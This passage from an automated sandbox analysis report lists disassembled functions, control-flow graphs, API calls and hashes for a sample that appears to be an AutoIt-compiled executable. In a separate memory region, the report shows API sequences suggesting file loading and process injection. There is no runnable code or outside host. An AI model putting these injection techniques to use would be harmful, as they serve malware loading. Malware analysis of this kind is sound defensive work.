                                                      • LoadIconW.USER32(000000A4), ref: 00F22BC5
                                                      • LoadIconW.USER32(000000A2), ref: 00F22BD7
                                                      • LoadImageW.USER32(00000063,00000001,00000010,00000010,00000000), ref: 00F22BEF
                                                      • RegisterClassExW.USER32(?), ref: 00F22C40
                                                        • Part of subcall function 00F22CD4: GetSysColorBrush.USER32(0000000F), ref: 00F22D07
                                                        • Part of subcall function 00F22CD4: RegisterClassExW.USER32(00000030), ref: 00F22D31
                                                        • Part of subcall function 00F22CD4: RegisterWindowMessageW.USER32(TaskbarCreated), ref: 00F22D42
                                                        • Part of subcall function 00F22CD4: InitCommonControlsEx.COMCTL32(?), ref: 00F22D5F
                                                        • Part of subcall function 00F22CD4: ImageList_Create.COMCTL32(00000010,00000010,00000021,00000001,00000001), ref: 00F22D6F
                                                        • Part of subcall function 00F22CD4: LoadIconW.USER32(000000A9), ref: 00F22D85
                                                        • Part of subcall function 00F22CD4: ImageList_ReplaceIcon.COMCTL32(000000FF,00000000), ref: 00F22D94
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.2047535020.0000000000F21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F20000, based on PE: true
                                                      • Associated: 00000000.00000002.2047520348.0000000000F20000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2047581108.0000000000FBC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2047581108.0000000000FE2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2047618845.0000000000FEC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2047636057.0000000000FF4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_f20000_0XLuA614VK.jbxd
                                                      Similarity
                                                      • API ID: Load$Icon$ImageRegister$BrushClassColorList_$CommonControlsCreateCursorInitMessageReplaceWindow
                                                      • String ID: #$0$AutoIt v3
                                                      • API String ID: 423443420-4155596026
                                                      • Opcode ID: 6bb601ec385dccdf60d722ad660b86613430b877a730fb570b779a869813f191
                                                      • Instruction ID: fbe7b3243a10236b9dcfb8975fdc440b9e750b3547beaee6e0b015cfc669ca0c
                                                      • Opcode Fuzzy Hash: 6bb601ec385dccdf60d722ad660b86613430b877a730fb570b779a869813f191
                                                      • Instruction Fuzzy Hash: F4212970E0031DEBDB109FA6EC99AAA7FB8FF48B50F14011AF600A66A0D7B50544EF90
                                                      Function 00F23170 Relevance: 15.9, APIs: 8, Strings: 1, Instructions: 145windowtimeregistryCOMMON
                                                      Download Yara Rule

                                                      Control-flow Graph

                                                      • Executed
                                                      • Not Executed
                                                      control_flow_graph 443 f23170-f23185 444 f23187-f2318a 443->444 445 f231e5-f231e7 443->445 446 f231eb 444->446 447 f2318c-f23193 444->447 445->444 448 f231e9 445->448 449 f231f1-f231f6 446->449 450 f62dfb-f62e23 call f218e2 call f3e499 446->450 451 f23265-f2326d PostQuitMessage 447->451 452 f23199-f2319e 447->452 453 f231d0-f231d8 DefWindowProcW 448->453 454 f231f8-f231fb 449->454 455 f2321d-f23244 SetTimer RegisterWindowMessageW 449->455 489 f62e28-f62e2f 450->489 460 f23219-f2321b 451->460 457 f231a4-f231a8 452->457 458 f62e7c-f62e90 call f8bf30 452->458 459 f231de-f231e4 453->459 461 f23201-f23214 KillTimer call f230f2 call f23c50 454->461 462 f62d9c-f62d9f 454->462 455->460 464 f23246-f23251 CreatePopupMenu 455->464 465 f231ae-f231b3 457->465 466 f62e68-f62e77 call f8c161 457->466 458->460 482 f62e96 458->482 460->459 461->460 474 f62dd7-f62df6 MoveWindow 462->474 475 f62da1-f62da5 462->475 464->460 471 f62e4d-f62e54 465->471 472 f231b9-f231be 465->472 466->460 471->453 476 f62e5a-f62e63 call f80ad7 471->476 480 f23253-f23263 call f2326f 472->480 481 f231c4-f231ca 472->481 474->460 483 f62dc6-f62dd2 SetFocus 475->483 484 f62da7-f62daa 475->484 476->453 480->460 481->453 481->489 482->453 483->460 484->481 485 f62db0-f62dc1 call f218e2 484->485 485->460 489->453 493 f62e35-f62e48 call f230f2 call f23837 489->493 493->453
                                                      APIs
                                                      • DefWindowProcW.USER32(?,?,?,?,?,?,?,?,?,00F2316A,?,?), ref: 00F231D8
                                                      • KillTimer.USER32(?,00000001,?,?,?,?,?,00F2316A,?,?), ref: 00F23204
                                                      • SetTimer.USER32(?,00000001,000002EE,00000000), ref: 00F23227
                                                      • RegisterWindowMessageW.USER32(TaskbarCreated,?,?,?,?,?,00F2316A,?,?), ref: 00F23232
                                                      • CreatePopupMenu.USER32 ref: 00F23246
                                                      • PostQuitMessage.USER32(00000000), ref: 00F23267
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.2047535020.0000000000F21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F20000, based on PE: true
                                                      • Associated: 00000000.00000002.2047520348.0000000000F20000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2047581108.0000000000FBC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2047581108.0000000000FE2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2047618845.0000000000FEC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2047636057.0000000000FF4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_f20000_0XLuA614VK.jbxd
                                                      Similarity
                                                      • API ID: MessageTimerWindow$CreateKillMenuPopupPostProcQuitRegister
                                                      • String ID: TaskbarCreated
                                                      • API String ID: 129472671-2362178303
                                                      • Opcode ID: 9f8d71b37262933d8a7991a5a1815ad9506c2775c7ba5cd0b99362731ea7f840
                                                      • Instruction ID: fa9379726252ece24b171f972b7fa8f52ef5f5712c3b146d79a59e2aa578c3eb
                                                      • Opcode Fuzzy Hash: 9f8d71b37262933d8a7991a5a1815ad9506c2775c7ba5cd0b99362731ea7f840
                                                      • Instruction Fuzzy Hash: 564107B2A4022CE7DB145B78AD49B7A3629FF05360F140125F541D61E2CB7ECA40FBA1
                                                      Function 00F58D45 Relevance: 13.8, APIs: 9, Instructions: 300COMMONLIBRARYCODE
                                                      Download Yara Rule

                                                      Control-flow Graph

                                                      • Executed
                                                      • Not Executed
                                                      control_flow_graph 499 f58d45-f58d55 500 f58d57-f58d6a call f4f2c6 call f4f2d9 499->500 501 f58d6f-f58d71 499->501 518 f590f1 500->518 503 f58d77-f58d7d 501->503 504 f590d9-f590e6 call f4f2c6 call f4f2d9 501->504 503->504 507 f58d83-f58dae 503->507 523 f590ec call f527ec 504->523 507->504 510 f58db4-f58dbd 507->510 511 f58dd7-f58dd9 510->511 512 f58dbf-f58dd2 call f4f2c6 call f4f2d9 510->512 516 f590d5-f590d7 511->516 517 f58ddf-f58de3 511->517 512->523 520 f590f4-f590f9 516->520 517->516 522 f58de9-f58ded 517->522 518->520 522->512 525 f58def-f58e06 522->525 523->518 528 f58e23-f58e2c 525->528 529 f58e08-f58e0b 525->529 532 f58e2e-f58e45 call f4f2c6 call f4f2d9 call f527ec 528->532 533 f58e4a-f58e54 528->533 530 f58e15-f58e1e 529->530 531 f58e0d-f58e13 529->531 536 f58ebf-f58ed9 530->536 531->530 531->532 563 f5900c 532->563 534 f58e56-f58e58 533->534 535 f58e5b-f58e79 call f53820 call f529c8 * 2 533->535 534->535 572 f58e96-f58ebc call f59424 535->572 573 f58e7b-f58e91 call f4f2d9 call f4f2c6 535->573 538 f58fad-f58fb6 call f5f89b 536->538 539 f58edf-f58eef 536->539 550 f59029 538->550 551 f58fb8-f58fca 538->551 539->538 544 f58ef5-f58ef7 539->544 544->538 548 f58efd-f58f23 544->548 548->538 553 f58f29-f58f3c 548->553 555 f5902d-f59045 ReadFile 550->555 551->550 556 f58fcc-f58fdb GetConsoleMode 551->556 553->538 558 f58f3e-f58f40 553->558 560 f59047-f5904d 555->560 561 f590a1-f590ac GetLastError 555->561 556->550 562 f58fdd-f58fe1 556->562 558->538 564 f58f42-f58f6d 558->564 560->561 568 f5904f 560->568 566 f590c5-f590c8 561->566 567 f590ae-f590c0 call f4f2d9 call f4f2c6 561->567 562->555 569 f58fe3-f58ffd ReadConsoleW 562->569 570 f5900f-f59019 call f529c8 563->570 564->538 571 f58f6f-f58f82 564->571 579 f59005-f5900b call f4f2a3 566->579 580 f590ce-f590d0 566->580 567->563 575 f59052-f59064 568->575 577 f58fff GetLastError 569->577 578 f5901e-f59027 569->578 570->520 571->538 582 f58f84-f58f86 571->582 572->536 573->563 575->570 585 f59066-f5906a 575->585 577->579 578->575 579->563 580->570 582->538 589 f58f88-f58fa8 582->589 593 f59083-f5908e 585->593 594 f5906c-f5907c call f58a61 585->594 589->538 599 f59090 call f58bb1 593->599 600 f5909a-f5909f call f588a1 593->600 604 f5907f-f59081 594->604 605 f59095-f59098 599->605 600->605 604->570 605->604
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.2047535020.0000000000F21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F20000, based on PE: true
                                                      • Associated: 00000000.00000002.2047520348.0000000000F20000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2047581108.0000000000FBC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2047581108.0000000000FE2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2047618845.0000000000FEC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2047636057.0000000000FF4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_f20000_0XLuA614VK.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: dbcac471b9d4f522ce41373532f355f5851d90f1fcddf3df764ede6b7878f994
                                                      • Instruction ID: 7454deea413a67f08b93fe4d4820355009f2bae8965d0ca7c3c0fb70ad4d30e9
                                                      • Opcode Fuzzy Hash: dbcac471b9d4f522ce41373532f355f5851d90f1fcddf3df764ede6b7878f994
                                                      • Instruction Fuzzy Hash: 5CC1E175D08249EFCF159FA8CC41BADBFB4AF09321F044159EE15A72D2C7748A4AEB60
                                                      Function 011625D0 Relevance: 10.7, APIs: 7, Instructions: 239fileCOMMON
                                                      Download Yara Rule

                                                      Control-flow Graph

                                                      • Executed
                                                      • Not Executed
                                                      control_flow_graph 607 11625d0-116267e call 1160000 610 1162685-11626ab call 11634e0 CreateFileW 607->610 613 11626b2-11626c2 610->613 614 11626ad 610->614 621 11626c4 613->621 622 11626c9-11626e3 VirtualAlloc 613->622 615 11627fd-1162801 614->615 616 1162843-1162846 615->616 617 1162803-1162807 615->617 623 1162849-1162850 616->623 619 1162813-1162817 617->619 620 1162809-116280c 617->620 626 1162827-116282b 619->626 627 1162819-1162823 619->627 620->619 621->615 628 11626e5 622->628 629 11626ea-1162701 ReadFile 622->629 624 11628a5-11628ba 623->624 625 1162852-116285d 623->625 632 11628bc-11628c7 VirtualFree 624->632 633 11628ca-11628d2 624->633 630 1162861-116286d 625->630 631 116285f 625->631 634 116282d-1162837 626->634 635 116283b 626->635 627->626 628->615 636 1162703 629->636 637 1162708-1162748 VirtualAlloc 629->637 640 1162881-116288d 630->640 641 116286f-116287f 630->641 631->624 632->633 634->635 635->616 636->615 638 116274f-116276a call 1163730 637->638 639 116274a 637->639 647 1162775-116277f 638->647 639->615 644 116288f-1162898 640->644 645 116289a-11628a0 640->645 643 11628a3 641->643 643->623 644->643 645->643 648 11627b2-11627c6 call 1163540 647->648 649 1162781-11627b0 call 1163730 647->649 655 11627ca-11627ce 648->655 656 11627c8 648->656 649->647 657 11627d0-11627d4 FindCloseChangeNotification 655->657 658 11627da-11627de 655->658 656->615 657->658 659 11627e0-11627eb VirtualFree 658->659 660 11627ee-11627f7 658->660 659->660 660->610 660->615
                                                      APIs
                                                      • CreateFileW.KERNELBASE(00000000,?,80000000,00000007,00000000,00000003,00000080,00000000,?,00000000), ref: 011626A1
                                                      • VirtualFree.KERNELBASE(00000000,00000000,00008000,00000000,00000000,00000000,00000000,?,?,00000000), ref: 011628C7
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.2047674279.0000000001160000.00000040.00001000.00020000.00000000.sdmp, Offset: 01160000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_1160000_0XLuA614VK.jbxd
                                                      Similarity
                                                      • API ID: CreateFileFreeVirtual
                                                      • String ID:
                                                      • API String ID: 204039940-0
                                                      • Opcode ID: e364f936384ad5a75a3e6820b612275e2b186d73597ef444eab7978b091760cf
                                                      • Instruction ID: 8358ce48cee6610d6b4ceed285650a64ada07773ec120eaa9a91ca4576110d64
                                                      • Opcode Fuzzy Hash: e364f936384ad5a75a3e6820b612275e2b186d73597ef444eab7978b091760cf
                                                      • Instruction Fuzzy Hash: AAA10A74E00209EBDB18CFA4C994FEEBBB9BF48305F208159E515BB280D77A9A50CB55
                                                      Function 00F22C63 Relevance: 10.5, APIs: 4, Strings: 2, Instructions: 44COMMON
                                                      Download Yara Rule

                                                      Control-flow Graph

                                                      • Executed
                                                      • Not Executed
                                                      control_flow_graph 671 f22c63-f22cd3 CreateWindowExW * 2 ShowWindow * 2
                                                      APIs
                                                      • CreateWindowExW.USER32(00000000,AutoIt v3,AutoIt v3,00CF0000,80000000,80000000,0000012C,00000064,00000000,00000000,00000000,00000001), ref: 00F22C91
                                                      • CreateWindowExW.USER32(00000000,edit,00000000,50B008C4,00000000,00000000,00000000,00000000,00000000,00000001,00000000), ref: 00F22CB2
                                                      • ShowWindow.USER32(00000000,?,?,?,?,?,?,00F21CAD,?), ref: 00F22CC6
                                                      • ShowWindow.USER32(00000000,?,?,?,?,?,?,00F21CAD,?), ref: 00F22CCF
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.2047535020.0000000000F21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F20000, based on PE: true
                                                      • Associated: 00000000.00000002.2047520348.0000000000F20000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2047581108.0000000000FBC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2047581108.0000000000FE2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2047618845.0000000000FEC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2047636057.0000000000FF4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_f20000_0XLuA614VK.jbxd
                                                      Similarity
                                                      • API ID: Window$CreateShow
                                                      • String ID: AutoIt v3$edit
                                                      • API String ID: 1584632944-3779509399
                                                      • Opcode ID: 65c30aed8acef1a232e64cef2a799872b108eddf3e5f8b8327be0bc1913ab2ff
                                                      • Instruction ID: 509f732b2049314cff861dc80dee1e271340629cc3dc37f098737711f78ab700
                                                      • Opcode Fuzzy Hash: 65c30aed8acef1a232e64cef2a799872b108eddf3e5f8b8327be0bc1913ab2ff
                                                      • Instruction Fuzzy Hash: 57F0DA76540298BAEB311717AC48EB73EBDEBC7F60B10005AF900A75A0C6625850FEB4
                                                      Function 011623B0 Relevance: 8.9, APIs: 4, Strings: 1, Instructions: 142fileCOMMON
                                                      Download Yara Rule

                                                      Control-flow Graph

                                                      • Executed
                                                      • Not Executed
                                                      control_flow_graph 786 11623b0-11624d1 call 1160000 call 11622a0 CreateFileW 793 11624d3 786->793 794 11624d8-11624e8 786->794 795 1162588-116258d 793->795 797 11624ef-1162509 VirtualAlloc 794->797 798 11624ea 794->798 799 116250d-1162524 ReadFile 797->799 800 116250b 797->800 798->795 801 1162526 799->801 802 1162528-1162562 call 11622e0 call 11612a0 799->802 800->795 801->795 807 1162564-1162579 call 1162330 802->807 808 116257e-1162586 ExitProcess 802->808 807->808 808->795
                                                      APIs
                                                        • Part of subcall function 011622A0: Sleep.KERNELBASE(000001F4), ref: 011622B1
                                                      • CreateFileW.KERNELBASE(?,80000000,00000007,00000000,00000003,00000080,00000000), ref: 011624C7
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.2047674279.0000000001160000.00000040.00001000.00020000.00000000.sdmp, Offset: 01160000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_1160000_0XLuA614VK.jbxd
                                                      Similarity
                                                      • API ID: CreateFileSleep
                                                      • String ID: 4W0WY03XLIM6SHVFKL
                                                      • API String ID: 2694422964-623809923
                                                      • Opcode ID: 6d8cf56364320bf1f0de4441f4162c778d1654398ae88b6262e6291ed6ba7dc9
                                                      • Instruction ID: 79655055b22c556a8707e32ccc24ca1e1841907daad863afee6749f56998d6b3
                                                      • Opcode Fuzzy Hash: 6d8cf56364320bf1f0de4441f4162c778d1654398ae88b6262e6291ed6ba7dc9
                                                      • Instruction Fuzzy Hash: 95517231D05259DBEF15DBA4C814BEEBB78AF15304F004199E609BB2C0D7BA1B49CBA6
                                                      Function 00F92947 Relevance: 7.8, APIs: 5, Instructions: 313fileCOMMON
                                                      Download Yara Rule

                                                      Control-flow Graph

                                                      APIs
                                                      • DeleteFileW.KERNEL32(?,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004), ref: 00F92C05
                                                      • DeleteFileW.KERNEL32(?), ref: 00F92C87
                                                      • CopyFileW.KERNELBASE(?,?,00000000,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004,00000001), ref: 00F92C9D
                                                      • DeleteFileW.KERNEL32(?,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004), ref: 00F92CAE
                                                      • DeleteFileW.KERNELBASE(?,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004), ref: 00F92CC0
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.2047535020.0000000000F21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F20000, based on PE: true
                                                      • Associated: 00000000.00000002.2047520348.0000000000F20000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2047581108.0000000000FBC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2047581108.0000000000FE2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2047618845.0000000000FEC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2047636057.0000000000FF4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_f20000_0XLuA614VK.jbxd
                                                      Similarity
                                                      • API ID: File$Delete$Copy
                                                      • String ID:
                                                      • API String ID: 3226157194-0
                                                      • Opcode ID: 3f749b4acce466bb0f23bcaecf8de2e312cff5d35e6a6ce696bead779cf12e88
                                                      • Instruction ID: 4f8d81d6634ab729df7c369feacc8970365ef197665d39d6ded8506296cf5775
                                                      • Opcode Fuzzy Hash: 3f749b4acce466bb0f23bcaecf8de2e312cff5d35e6a6ce696bead779cf12e88
                                                      • Instruction Fuzzy Hash: 8BB14F72D00129ABDF61DFA4CC85EDEBBBDEF48350F1040A6F509E6151EA349E44AF61
                                                      Function 00F23B1C Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 58registryCOMMON
                                                      Download Yara Rule

                                                      Control-flow Graph

                                                      • Executed
                                                      • Not Executed
                                                      control_flow_graph 952 f23b1c-f23b27 953 f23b99-f23b9b 952->953 954 f23b29-f23b2e 952->954 956 f23b8c-f23b8f 953->956 954->953 955 f23b30-f23b48 RegOpenKeyExW 954->955 955->953 957 f23b4a-f23b69 RegQueryValueExW 955->957 958 f23b80-f23b8b RegCloseKey 957->958 959 f23b6b-f23b76 957->959 958->956 960 f23b90-f23b97 959->960 961 f23b78-f23b7a 959->961 962 f23b7e 960->962 961->962 962->958
                                                      APIs
                                                      • RegOpenKeyExW.KERNELBASE(80000001,Control Panel\Mouse,00000000,00000001,00000000,?,?,80000001,80000001,?,00F23B0F,SwapMouseButtons,00000004,?), ref: 00F23B40
                                                      • RegQueryValueExW.KERNELBASE(00000000,00000000,00000000,00000000,?,?,?,?,?,80000001,80000001,?,00F23B0F,SwapMouseButtons,00000004,?), ref: 00F23B61
                                                      • RegCloseKey.KERNELBASE(00000000,?,?,?,80000001,80000001,?,00F23B0F,SwapMouseButtons,00000004,?), ref: 00F23B83
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.2047535020.0000000000F21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F20000, based on PE: true
                                                      • Associated: 00000000.00000002.2047520348.0000000000F20000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2047581108.0000000000FBC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2047581108.0000000000FE2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2047618845.0000000000FEC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2047636057.0000000000FF4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_f20000_0XLuA614VK.jbxd
                                                      Similarity
                                                      • API ID: CloseOpenQueryValue
                                                      • String ID: Control Panel\Mouse
                                                      • API String ID: 3677997916-824357125
                                                      • Opcode ID: 130917eb1db4cf714a29d0c11c6f34dc75deb7b3b94c5372ceb138ff5fefbb91
                                                      • Instruction ID: 15c9be64fa4cdaf7512d710df768b4bcc3226e49cc1441c1b4761f19494c2de0
                                                      • Opcode Fuzzy Hash: 130917eb1db4cf714a29d0c11c6f34dc75deb7b3b94c5372ceb138ff5fefbb91
                                                      • Instruction Fuzzy Hash: 7A113CB5511218FFDB20DFA5EC84EAFBBB8EF44794B104559F805D7110D2359F40ABA0
                                                      Function 011612A0 Relevance: 6.7, APIs: 4, Instructions: 720processthreadCOMMON
                                                      Download Yara Rule
                                                      APIs
                                                      • CreateProcessW.KERNELBASE(?,00000000), ref: 01161A5B
                                                      • Wow64GetThreadContext.KERNEL32(?,00010007), ref: 01161AF1
                                                      • ReadProcessMemory.KERNELBASE(?,?,?,00000004,00000000), ref: 01161B13
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.2047674279.0000000001160000.00000040.00001000.00020000.00000000.sdmp, Offset: 01160000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_1160000_0XLuA614VK.jbxd
                                                      Similarity
                                                      • API ID: Process$ContextCreateMemoryReadThreadWow64
                                                      • String ID:
                                                      • API String ID: 2438371351-0
                                                      • Opcode ID: a5f8eca76df1c4d60a387bf050efe929c827b8bdc82418feca4108ede207e1c1
                                                      • Instruction ID: be6ae8d070263e2d406f89512272dde43c60a2a6e3acd6a7b8f5c5d71dbfe6b9
                                                      • Opcode Fuzzy Hash: a5f8eca76df1c4d60a387bf050efe929c827b8bdc82418feca4108ede207e1c1
                                                      • Instruction Fuzzy Hash: 0A620F30A14258DBEB28CFA4CC50BDEB775EF58300F1091A9D10DEB294E7769E91CB59
                                                      Function 00F2DFD0 Relevance: 6.7, APIs: 2, Strings: 1, Instructions: 1414COMMON
                                                      Download Yara Rule
                                                      Strings
                                                      • Variable must be of type 'Object'., xrefs: 00F732B7
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.2047535020.0000000000F21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F20000, based on PE: true
                                                      • Associated: 00000000.00000002.2047520348.0000000000F20000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2047581108.0000000000FBC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2047581108.0000000000FE2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2047618845.0000000000FEC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2047636057.0000000000FF4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_f20000_0XLuA614VK.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID: Variable must be of type 'Object'.
                                                      • API String ID: 0-109567571
                                                      • Opcode ID: ce37803d7b7bb8fac1f35c683242e1d30e3573160224ed0d03480a92a999073d
                                                      • Instruction ID: 85bd166e68de0baa4c5906c52f91fa1c02a1e86caa1f5161c2f2fa12eaad1890
                                                      • Opcode Fuzzy Hash: ce37803d7b7bb8fac1f35c683242e1d30e3573160224ed0d03480a92a999073d
                                                      • Instruction Fuzzy Hash: 8DC28C75E00225DFCB24CF58E881AADB7B1FF08320F288169E955AB391D375ED41EB91
                                                      Function 00F2EC40 Relevance: 5.7, APIs: 3, Instructions: 1195COMMON
                                                      Download Yara Rule
                                                      APIs
                                                      • __Init_thread_footer.LIBCMT ref: 00F2FE66
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.2047535020.0000000000F21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F20000, based on PE: true
                                                      • Associated: 00000000.00000002.2047520348.0000000000F20000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2047581108.0000000000FBC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2047581108.0000000000FE2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2047618845.0000000000FEC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2047636057.0000000000FF4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_f20000_0XLuA614VK.jbxd
                                                      Similarity
                                                      • API ID: Init_thread_footer
                                                      • String ID:
                                                      • API String ID: 1385522511-0
                                                      • Opcode ID: 449d1eac9b6930dc602821f81d15ca823d16ae2b5872f6b81524ee2dcc45d426
                                                      • Instruction ID: 1919a625d2fe3013a1f0e79aa84a68164a413eb4e16c342788f02f1b63522fb2
                                                      • Opcode Fuzzy Hash: 449d1eac9b6930dc602821f81d15ca823d16ae2b5872f6b81524ee2dcc45d426
                                                      • Instruction Fuzzy Hash: F3B28D75A08361CFDB14CF18E490A2AB7F1BF89320F24486DE9858B351D775EC49EB92
                                                      Function 00F23923 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 94windowCOMMON
                                                      Download Yara Rule
                                                      APIs
                                                      • LoadStringW.USER32(00000065,?,0000007F,00000104), ref: 00F633A2
                                                        • Part of subcall function 00F26B57: _wcslen.LIBCMT ref: 00F26B6A
                                                      • Shell_NotifyIconW.SHELL32(00000001,?), ref: 00F23A04
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.2047535020.0000000000F21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F20000, based on PE: true
                                                      • Associated: 00000000.00000002.2047520348.0000000000F20000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2047581108.0000000000FBC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2047581108.0000000000FE2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2047618845.0000000000FEC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2047636057.0000000000FF4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_f20000_0XLuA614VK.jbxd
                                                      Similarity
                                                      • API ID: IconLoadNotifyShell_String_wcslen
                                                      • String ID: Line:
                                                      • API String ID: 2289894680-1585850449
                                                      • Opcode ID: 23af6d0ed45971f56abc37da3a3e640a1176b2e30458be72a1242e9aa5b40c57
                                                      • Instruction ID: 0f92ce7b4bf9ebcc39878b9ca46adb875e72a2b066430572fe004772efbf611c
                                                      • Opcode Fuzzy Hash: 23af6d0ed45971f56abc37da3a3e640a1176b2e30458be72a1242e9aa5b40c57
                                                      • Instruction Fuzzy Hash: 9931D6B1908324AAD725EB10EC45FEB77DCAF45710F00492AF59993191DF789A48EBC2
                                                      Function 00F3FDDB Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 43COMMON
                                                      Download Yara Rule
                                                      APIs
                                                      • __CxxThrowException@8.LIBVCRUNTIME ref: 00F40668
                                                        • Part of subcall function 00F432A4: RaiseException.KERNEL32(?,?,?,00F4068A,?,00FF1444,?,?,?,?,?,?,00F4068A,00F21129,00FE8738,00F21129), ref: 00F43304
                                                      • __CxxThrowException@8.LIBVCRUNTIME ref: 00F40685
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.2047535020.0000000000F21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F20000, based on PE: true
                                                      • Associated: 00000000.00000002.2047520348.0000000000F20000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2047581108.0000000000FBC000.00000002.00000001.01000000.00000003.sdmpDownload File
